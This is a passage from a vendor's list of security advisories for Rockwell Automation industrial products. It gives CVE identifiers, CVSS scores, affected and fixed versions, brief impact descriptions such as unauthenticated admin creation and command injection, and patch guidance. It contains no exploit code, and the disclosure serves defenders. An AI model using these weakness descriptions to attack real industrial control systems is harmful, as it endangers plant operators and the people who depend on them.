CWE: CWE-1287: Improper Validation of Specified Type of Input

Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment specific prioritization.

Mitigations and Workarounds

Customers using the affected software, who are not able to upgrade to one of the corrected versions, are encouraged to apply security best practices, where possible.   

Security Best Practices

Critical

SD1722 | Lifecycle Services with VMware are Vulnerable to third-party Vulnerabilities

Published Date:

March 07, 2025

Last Updated:

March 07, 2025

CVE IDs:

CVE-2025-22224, CVE-2025-22225, CVE-2025-22226

CVSS Scores (v3.1):

9.3, 8.2, 7.1

CVSS Scores (v4.0):

9.4, 9.3, 8..2

Known Exploited Vulnerability (KEV):

Yes

Corrected:

Yes

Workaround:

Yes

More Details Less Details

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found through a third-party advisory and is being reported based on our commitment to customer transparency to improve all business environment.

AFFECTED PRODUCTS AND SOLUTION

Affected Product	Affected Versions	Corrected in software version
Industrial Data Center (IDC) with VMware	Generations 1 – 4	Refer to Mitigations and Workarounds
VersaVirtual™ Appliance (VVA) with VMware	Series A & B	Refer to Mitigations and Workarounds
Threat Detection Managed Services (TDMS) with VMware	All	Refer to Mitigations and Workarounds
Endpoint Protection Service with RA PRoxy & VMware only	All	Refer to Mitigations and Workarounds
Engineered and Integrated Solutions with VMware	All	Refer to Broadcom’s advisory

Remediations and Workarounds

Users with an active Rockwell Automation Infrastructure Managed Service contract or Threat Detection Managed Service contract:

Rockwell Automation will contact impacted users to discuss actions needed for remediation efforts.

Users without Rockwell Automation managed services contract, refer to Broadcom’s advisories below:

· Support Content Notification - Support Portal - Broadcom support portal

· https://techdocs.broadcom.com/us/en/vmware-cis/vsphere/vsphere/8-0/release-notes/esxi-update-and-patch-release-notes/vsphere-esxi-80u3d-release-notes.html

· https://techdocs.broadcom.com/us/en/vmware-cis/vsphere/vsphere/8-0/release-notes/esxi-update-and-patch-release-notes/vsphere-esxi-80u2d-release-notes.html

· https://techdocs.broadcom.com/us/en/vmware-cis/vsphere/vsphere/7-0/release-notes/esxi-update-and-patch-release-notes/vsphere-esxi-70u3s-release-notes.html

Additionally, users using the affected software, who are not able to upgrade to one of the corrected versions, are encouraged to apply security best practices, where possible.

· Security Best Practices

VULNERABILITY DETAILS

Rockwell Automation used v3.1 and v4.0 of the CVSS scoring system to assess the following vulnerabilities.

CVE-2025-22224

A Time of Check Time of use (TOCTOU) vulnerability exists in VMware ESXi, which the affected products use. Exploitation of the vulnerability can allow a threat actor with local administrative privileges to execute code as the virtual machine's VMX process running on the host.

CVSS 3.1 Base Score: 9.3

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

CVSS 4.0 Base Score: 9.4

CVSS Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

Known Exploited Vulnerability (KEV) database: Yes

CVE-2025-22225

A code execution vulnerability exists in VMware ESXi, which the affected products use. Exploitation of the vulnerability can allow a threat actor with privileges within the VMX process trigger an arbitrary kernel write, leading to an escape of the sandbox.

CVSS 3.1 Base Score: 8.2

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

CVSS 4.0 Base Score: 9.3

CVSS Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

Known Exploited Vulnerability (KEV) database: Yes

CVE-2025-22226

An out of bounds vulnerability exists in VMware ESXi, which the affected products use. Exploitation of the vulnerability can allow a threat actor with administrative privileges to leak memory from the vmx process.

CVSS 3.1 Base Score: 7.1

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

CVSS 4.0 Base Score: 8.2

CVSS Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N

Known Exploited Vulnerability (KEV) database: Yes

Users can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

The following link provides CVE information in Vulnerability Exploitability Exchange (VEX) format, which is machine readable and can be used to automate vulnerability management and tracking activities.

Critical

SD1721 | FactoryTalk® AssetCentre Multiple Vulnerabilities

Published Date:

January 29, 2025

Last Updated:

January 29, 2025

CVE IDs:

CVE-2025-0477 , CVE-2025-0497, CVE-2025-0498

CVSS Scores (v3.1):

9.8, 7.0, 7.8

CVSS Scores (v4.0):

9.3, 7.3, 7.0

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

Yes

More Details Less Details

AFFECTED PRODUCTS AND SOLUTION

Affected Product	CVE	Affected Versions	Corrected Version
FactoryTalk® AssetCentre	CVE-2025-0477	All prior to V15.00.001	V15.00.01 and later
	CVE-2025-0497		V11, V12, and V13 (patch available) V15.00.01 and later
	CVE-2025-0498		V11, V12, and V13 (patch available) V15.00.01 and later

Mitigations and Workarounds
Customers using the affected software are encouraged to apply the risk mitigations, if possible.

For CVE-2025-0477:

o Update FactoryTalk® AssetCentre to v15.00.01 or later.

o The encrypted data is stored in a table in the database. Control access to the database by non-essential users.

For CVE-2025-0497

o Update FactoryTalk® AssetCentre to v15.00.01 or later.

o Apply patches to correct legacy versions:

§ To apply the patch for LogCleanUp or ArchiveLogCleanUp download and install the Rockwell Automation January 2025 Monthly Patch rollup, or later

§ To apply patches for EventLogAttachmentExtractor or ArchiveExtractor, locate the article BF31148, download the patch files and follow the instructions.

o Restrict physical access to the machine to authorized users.

For CVE-2025-0498

o Update FactoryTalk® AssetCentre to v15.00.01 or later.

o Apply patches to correct legacy versions:

§ To apply the patch for download and install the Rockwell Automation January 2025 Monthly Patch rollup, or later

o Restrict physical access to the machine to authorized users.

For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

VULNERABILITY DETAILS

CVE-2025-0477 and CVE-2025-0497 reported to Rockwell Automation by Nestlé - Alban Avdiji. CVE-2025-0498 was found internally by Rockwell Automation during routine testing. Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2025-0477 IMPACT

An encryption vulnerability exists in all versions prior to V15.00.001 of FactoryTalk® AssetCentre. The vulnerability exists due to a weak encryption methodology and could allow a threat actor to extract passwords belonging to other users of the application.

CVSS 3.1 Base Score: 9.8
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 9.3
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE-326: Inadequate Encryption Strength
Known Exploited Vulnerability (KEV) database: No

CVE-2025-0497 IMPACT

A data exposure vulnerability exists in all versions prior to V15.00.001 of FactoryTalk® AssetCentre. The vulnerability exists due to storing credentials in the configuration file of EventLogAttachmentExtractor, ArchiveExtractor, LogCleanUp, or ArchiveLogCleanUp packages.

CVSS 3.1 Base Score: 7.0
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 7.3
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE-522: Insufficiently Protected Credentials
Known Exploited Vulnerability (KEV) database: No

CVE-2025-0498 IMPACT

A data exposure vulnerability exists in all versions prior to V15.00.001 of FactoryTalk® AssetCentre. The vulnerability exists due to insecure storage of FactoryTalk® Security user tokens, which could allow a threat actor to steal a token and, impersonate another user.

CVSS 3.1 Base Score: 7.8
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 7.0
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE-522: Insufficiently Protected Credentials
Known Exploited Vulnerability (KEV) database: No

Critical

SD1715 | Path Traversal and Third-party Vulnerability in DataMosaix™ Private Cloud

Published Date:

January 28, 2025

Last Updated:

January 28, 2025

CVE IDs:

CVE-2025-0659, CVE-2020-11656

CVSS Scores (v3.1):

5.5, 9.8

CVSS Scores (v4.0):

7.0, 9.3

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

No

More Details Less Details

AFFECTED PRODUCTS AND SOLUTION

Affected Product	CVE	Affected Software Version	Corrected in Software Version
DataEdgePlatform DataMosaix™ Private Cloud	CVE-2025-0659	<=7.11	7.11.01
DataEdgePlatform DataMosaix™ Private Cloud	CVE-2020-11656	<=7.09	7.11.01

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2025-0659 IMPACT

A path traversal vulnerability exists in the affected product. By specifying the character sequence in the body of the vulnerable endpoint, it is possible to overwrite files outside of the intended directory. A threat actor with admin privileges could leverage this vulnerability to overwrite reports including user projects.

CVSS 3.1 Base Score: 5.5
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:N

CVSS 4.0 Base Score: 7.0
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N

CWE: 200 - Exposure of Sensitive Information to an unauthorized Actor
Known Exploited Vulnerability (KEV) database: No

CVE-2020-11656 IMPACT

The affected product utilizes SQLite, which contains a use after free vulnerability in the ALTER TABLE implementation, which was demonstrated by an ORDER BY clause that belongs to a compound SELECT statement.

CVSS 3.1 Base Score: 9.8
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 9.3
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE: 1395 - Dependency on Vulnerable third-party Component
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds

For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

High

SD1718 | 5380/5580 Denial-of-Service Vulnerability

Published Date:

January 28, 2025

Last Updated:

January 30, 2025

CVE IDs:

CVE-2025-24478

CVSS Scores (v3.1):

6.5

CVSS Scores (v4.0):

7.1

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

Yes

More Details Less Details

AFFECTED PRODUCTS AND SOLUTION

Affected Product(s)

First Known in Software Version

Corrected in Software Version

GuardLogix 5580

Compact GuardLogix 5380 SIL3

V33.011

V33.017, V34.014, V35.013, V36.011 and later

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2025-24478 IMPACT

A denial-of-service vulnerability exists in the affected products. The vulnerability could allow a remote, non-privileged user to send malicious requests resulting in a major nonrecoverable fault causing a denial-of-service.

CVSS 3.1 Base Score: 6.5
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVSS 4.0 Base Score: 7.1
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

CWE: CWE-755: Improper Handling of Exceptional Conditions
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds
Customers using the affected software are encouraged to apply the risk mitigations, if possible.

· Restrict Access to the task object via CIP Security and Hard Run.

· For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Critical

SD1719 | FactoryTalk® View Machine Edition Multiple Vulnerabilities

Published Date:

January 28, 2025

Last Updated:

February 05, 2025

CVE IDs:

CVE-2025-24479, CVE-2025-24480

CVSS Scores (v3.1):

8.4, 9.8

CVSS Scores (v4.0):

8.6, 9.3

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

Yes

More Details Less Details

AFFECTED PRODUCTS AND SOLUTION

Affected Product

CVE

Affected Version(s)

Corrected in Software Version

FactoryTalk® View Machine Edition

CVE-2025-24479

< V15

V15 and Patch for V12, V13, V14 (AID 1152309)

CVE-2025-24480

< V15

V15 and patch for V12, V13, V14 (AID 1152571)

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2025-24479 IMPACT

A Local Code Execution Vulnerability exists in the product and version listed above. The vulnerability is due to a default setting in Windows and allows access to the Command Prompt as a higher privileged user.

CVSS 3.1 Base Score: 8.4
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.6
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE-863: Incorrect Authorization
Known Exploited Vulnerability (KEV) database: No

CVE-2025-24480 IMPACT

A Remote Code Execution Vulnerability exists in the product and version listed above. The vulnerability is due to lack of input sanitation and could allow a remote attacker to run commands or code as a high privileged user.

CVSS 3.1 Base Score: 9.8
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 9.3
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') & CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds
Customers using the affected software are encouraged to apply the risk mitigations, if possible.

· CVE-2025-24479:

· Upgrade to V15.00 or apply patch in AID 1152309

· Control physical access to the system

· CVE-2025-24480:

· Upgrade to V15.00 or apply patch in AID 1152571

· Protect network access to the device

· Strictly constrain the parameters of invoked functions

For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

High

SD1720 | FactoryTalk® View Site Edition Multiple Vulnerabilities

Published Date:

January 28, 2025

Last Updated:

January 28, 2025

CVE IDs:

CVE-2025-24481, CVE-2025-24482

CVSS Scores (v3.1):

7.3

CVSS Scores (v4.0):

7.0

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

Yes

More Details Less Details

AFFECTED PRODUCTS AND SOLUTION

Affected Product	CVE	Affected Version(s)	Corrected in Software Version
FactoryTalk® View SE	CVE-2025-24481	< V15.0	V15.0, and patch for v14 (AID 1152306)
FactoryTalk® View SE	CVE-2025-24482	< V15.0	V15.0, and patches for V12, V13, V14 (1152304)

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2025-24481 IMPACT

An Incorrect Permission Assignment Vulnerability exists in the product and version listed above. The vulnerability is due to incorrect permissions being assigned to the remote debugger port and can allow for unauthenticated access to the system configuration.

CVSS 3.1 Base Score: 7.3
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H

CVSS 4.0 Base Score: 7.0
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:H/SC:N/SI:N/SA:N

CWE-732: Incorrect Permission Assignment for Critical Resource
Known Exploited Vulnerability (KEV) database: No

CVE-2025-24482 IMPACT

A Local Code Injection Vulnerability exists in the product and version listed above. The vulnerability is due to incorrect default permissions and allows for DLLs to be executed with higher level permissions.

CVSS 3.1 Base Score: 7.3
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H

CVSS 4.0 Base Score: 7.0
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:H/SC:N/SI:N/SA:N

CWE-94: Improper Control of Generation of Code ('Code Injection')
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds
Customers using the affected software are encouraged to apply the risk mitigations, if possible.

· For CVE-2025-24481:

· Upgrade to V15 or apply patch. Answer ID 1152306

· Protect physical access to the workstation

· Restrict access to port 8091 at the network or workstation

· For CVE-2025-24482:

· Upgrade to V15 or apply patch. Answer ID 1152304.

· Check the environment variables (PATH), and make sure FactoryTalk® View SE installation path (C:\Program Files (x86)\Common Files\Rockwell) is before all others

For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

High

SD1716 | KEPServer Denial-of-Service Vulnerability Found During Pwn2Own Competition

Published Date:

January 28, 2025

Last Updated:

August 06, 2025

CVE IDs:

CVE-2023-3825

Products:

KEPServer

CVSS Scores (v3.1):

7.5

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

No

More Details Less Details

AFFECTED PRODUCTS AND SOLUTION

Affected Product	CVE	Affected Versions	Fixed Version
KEPServer	CVE-2023-3825	6.0 - 6.14.263	6.15

SECURITY ISSUE DETAILS

Rockwell Automation received a report from PTC regarding a security issue discovered by Security Researchers of Claroty Team82.

Rockwell Automation uses the latest version of the CVSS scoring system to assess the security issues.

CVE-2023-3825 IMPACT

KEPServerEX Versions 6.0 to 6.14.263 are open to being made to read a repeatedly defined object that leads to uncontrolled resource consumption. KEPServerEX uses OPC UA, a protocol which defines various object types that can be stored to create complex arrays. It does not apply a check to see if such an object is recursively defined. An attacker could send a maliciously created message that the decoder would try to decode until the stack overflowed and the device crashed.

CVSS 3.1 Base Score: 7.5
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE-400: Uncontrolled Resource Consumption
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds
Customers using the affected software should use risk mitigations.

· For information on Security Risks and how to reduce risks, customers should use our suggested security best practices.

Customers can use Stakeholder-Specific Vulnerability Categorization to create more environment-specific categories.

ADDITIONAL RESOURCES

· NVD - CVE-2023-3825

· PTC KEPServerEX | CISA

· CS405439 - Security vulnerabilities identified in PTC Kepware products - November 2023

Glossary:

Claroty Team82: a research arm that provides vulnerability and threat research to customers and defenders of industrial networks worldwide

KEPServerEX: connectivity platform that provides a single source of industrial automation

Known Exploited Vulnerability (KEV) database: an official list of security flaws that attackers have actively exploited

High

SD1717 | PowerFlex® 755 Credential Exposure Vulnerability

Published Date:

January 28, 2025

Last Updated:

January 28, 2025

CVE IDs:

CVE-2025-0631

Products:

PowerFlex 755

CVSS Scores (v3.1):

7.5

CVSS Scores (v4.0):

8.7

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

No

More Details Less Details

AFFECTED PRODUCTS AND SOLUTION

Affected Product	Affected Version(s)	Fixed Version
PowerFlex® 755	<=16.002.279	v20.3.407

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2025-0631 IMPACT

A Credential Exposure Vulnerability exists in the above-mentioned product and version. The vulnerability is due to using HTTP resulting in credentials being sent in clear text.

CVSS 3.1 Base Score: 7.5
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CVSS 4.0 Base Score: 8.7
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N

CWE-319: Cleartext Transmission of Sensitive Information
Known Exploited Vulnerability (KEV) database: None

Mitigations and Workarounds
Customers using the affected software are encouraged to apply the risk mitigations, if possible.

· For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Critical

SD1714 | PowerMonitor™ 1000 Remote Code Execution and Denial-of-Service Vulnerabilities via HTTP Protocol

Published Date:

December 17, 2024

Last Updated:

December 17, 2024

CVE IDs:

CVE-2024-12371 , CVE-2024-12372 , CVE-2024-12373

CVSS Scores (v3.1):

9.8, 9.8, 9.8

CVSS Scores (v4.0):

9.3, 9.3, 9.3

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

No

More Details Less Details

Published Date: December 17, 2024

Last updated: August 6, 2025

Revision Number: 1.0

CVSS Score: v3.1: 9.8/10, v4.0: 9.3/10

AFFECTED PRODUCTS AND SOLUTION

Affected Products	Affected firmware revision	Corrected in firmware revision
PM1k 1408-BC3A-485	<4.020	4.020
PM1k 1408-BC3A-ENT	<4.020	4.020
PM1k 1408-TS3A-485	<4.020	4.020
PM1k 1408-TS3A-ENT	<4.020	4.020
PM1k 1408-EM3A-485	<4.020	4.020
PM1k 1408-EM3A-ENT	<4.020	4.020
PM1k 1408-TR1A-485	<4.020	4.020
PM1k 1408-TR2A-485	<4.020	4.020
PM1k 1408-EM1A-485	<4.020	4.020
PM1k 1408-EM2A-485	<4.020	4.020
PM1k 1408-TR1A-ENT	<4.020	4.020
PM1k 1408-TR2A-ENT	<4.020	4.020
PM1k 1408-EM1A-ENT	<4.020	4.020
PM1k 1408-EM2A-ENT	<4.020	4.020

SECURTIY ISSUE DETAILS

Rockwell Automation used version 3.1 and 4.0 of the CVSS scoring systems to assess the following security issues. The following issues were reported by Vera Mens of Claroty Research - Team82.

CVE-2024-12371 IMPACT

A device takeover security issue exists in the affected product. This allows configuration of a new Policyholder user without any authentication via API. A policyholder user is the most privileged user that can perform edit operations. This creates admin users and performs a factory reset.

CVSS 3.1 Base Score: 9.8/10

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CSVV 4.0 Base Score: 9.3/10

CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE-420: Unprotected Alternate Channel

CVE-2024-12372 IMPACT

A denial-of-service and possible remote code execution security issue exists in the affected product. This issue results in corruption of the heap memory which may compromise the integrity of the system. This could allow a remote code execution or a denial-of-service attack.

CVSS 3.1 Base Score: 9.8/10

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CSVV 4.0 Base Score: 9.3/10

CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE-122: Heap-based Buffer Overflows

CVE-2024-12373 IMPACT

A denial-of-service security issue exists in the affected product. This results in a buffer-overflow which could cause a denial-of-service.

CVSS 3.1 Base Score: 9.8/10

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CSVV 4.0 Base Score: 9.3/10

CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE-120: Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')

Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to create more environment-specific categories.

Mitigations and Workarounds

Customers using the affected software that can't upgrade to one of the corrected version should use the security best practices.

· Security Best Practices

Glossary

Buffer Overflow: when a program writes more data to a buffer than it can hold, causing the excess data to overflow into adjacent memory locations

Denial-of-Service: malicious attempt to overwhelm a web property with traffic in order to disrupt its normal operations

Known Exploited Vulnerability (KEV) database: an official list of security flaws that attackers have actively exploited

High

SD1713 | Multiple Code Execution Vulnerabilities in Arena®

Published Date:

December 04, 2024

Last Updated:

December 19, 2024

CVE IDs:

CVE-2024-11155 , CVE-2024-11156 , CVE-2024-11158 , CVE-2024 -12130 , CVE-2024-11157, CVE-2024-12672, CVE-2024-11364, CVE-2024-12175

CVSS Scores (v3.1):

7.8

CVSS Scores (v4.0):

8.5

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

Yes

More Details Less Details

Published Date: 12/04/24

Last updated: August 6, 2025

Revision Number: 2.0

CVSS Score: v3.1: 7.8, v4.0 8.5

AFFECTED PRODUCTS AND SOLUTION

Affected Product	CVE	Affected Software Version	Corrected in Software Version
Software - Arena	CVE-2024-11155	All versions 16.20.00 and prior	V16.20.06 and later
	CVE-2044-11156	All versions 16.20.03 and prior	V16.20.06 and later
	CVE-2024-11158	All versions 16.20.00 and prior	V16.20.06 and later
	CVE-2024 -12130	All versions 16.20.05 and prior	V16.20.06 and later
	CVE-2024-11157	All versions 16.20.06 and prior	V16.20.07 and later
	CVE-2024-12175	All versions 16.20.06 and prior	V16.20.07 and later
Software – Arena® 32 bit	CVE-2024-12672	All versions 16.20.07 and prior	n/a – see mitigations
Software – Arena® 32 bit	CVE-2024-11364	All versions 16.20.06 and prior	V16.20.07 and later

SECURITY ISSUE DETAILS

Rockwell Automation useS the latest version of the CVSS scoring system to assess the security issues. These security issues were reported by ZDI (Zero Day Initiative).

CVE-2024-11155 IMPACT

A “use after free” code execution security issue exists in the affected products. These could allow a threat actor to craft a DOE file and force the software to use a resource that was already used. A threat actor could leverage this issue to execute arbitrary code. A legitimate user must execute the malicious code crafted by the threat actor for this to be used.

CVSS 3.1 Base Score: 7.8

CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.5
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE: CWE-416 Use After Free

Known Exploited Vulnerability (KEV) database: No

CVE-2024-11156 IMPACT

An “out of bounds write” code execution security issue exists in the affected products. This could allow a threat actor to write beyond the boundaries of allocated memory in a DOE file. A threat actor could use this to execute arbitrary code. A legitimate user must execute the malicious code crafted by the threat actor for this to be used.

CVSS 3.1 Base Score: 7.8

CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.5
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE: CWE-787 Out-of-bounds Write
Known Exploited Vulnerability (KEV) database: No

CVE-2024-11158 IMPACT

An “uninitialized variable” code execution security issue exists in the affected products. This could allow a threat actor to craft a DOE file and force the software to access a variable before it being initialized. A threat actor could use this to execute arbitrary code. A legitimate user must execute the malicious code crafted by the threat actor. for this to be used.

CVSS 3.1 Base Score: 7.8

CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.5
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE: CWE-665 Improper Initialization

Known Exploited Vulnerability (KEV) database: No

CVE-2024-12130 IMPACT

An “out of bounds read” code execution security issue exists in the affected products. This could allow a threat actor to craft a DOE file and force the software to read beyond the boundaries of an allocated memory. A threat actor could use this to execute arbitrary code. A legitimate user must execute the malicious code crafted by the threat actor for this to be used.

CVSS 3.1 Base Score: 7.8

CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.5
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE: CWE-125: Out-of-bounds Read

Known Exploited Vulnerability (KEV) database: No

CVE-2024-11157

A third-party security issue exists in the affected products. This could allow a threat actor to write beyond the boundaries of allocated memory in a DOE file. A threat actor could leverage this to execute arbitrary code. A legitimate user must execute the malicious code crafted by the threat actor for this to be used.

CVSS 3.1 Base Score: 7.8

CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.5
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE: CWE-787 Out-of-bounds Write
Known Exploited Vulnerability (KEV) database: No

CVE-2024-12672

A third-party security issue exists in the affected products. This could allow a threat actor to write beyond the boundaries of allocated memory in a DOE file. A threat actor could leverage this to execute arbitrary code. A legitimate user must execute the malicious code crafted by the threat actor for this to be used.

CVSS 3.1 Base Score: 7.8

CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.5
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE: CWE-1395 Dependency on third-party Component

Known Exploited Vulnerability (KEV) database: No

CVE-2024-11364

Another “uninitialized variable” code execution security issue exists in the affected products. This could allow a threat actor to craft a DOE file and force the software to access a variable prior to it being initialized. A threat actor could leverage this to execute arbitrary code. A legitimate user must execute the malicious code crafted by the threat actor. for this to be used.

CVSS 3.1 Base Score: 7.8

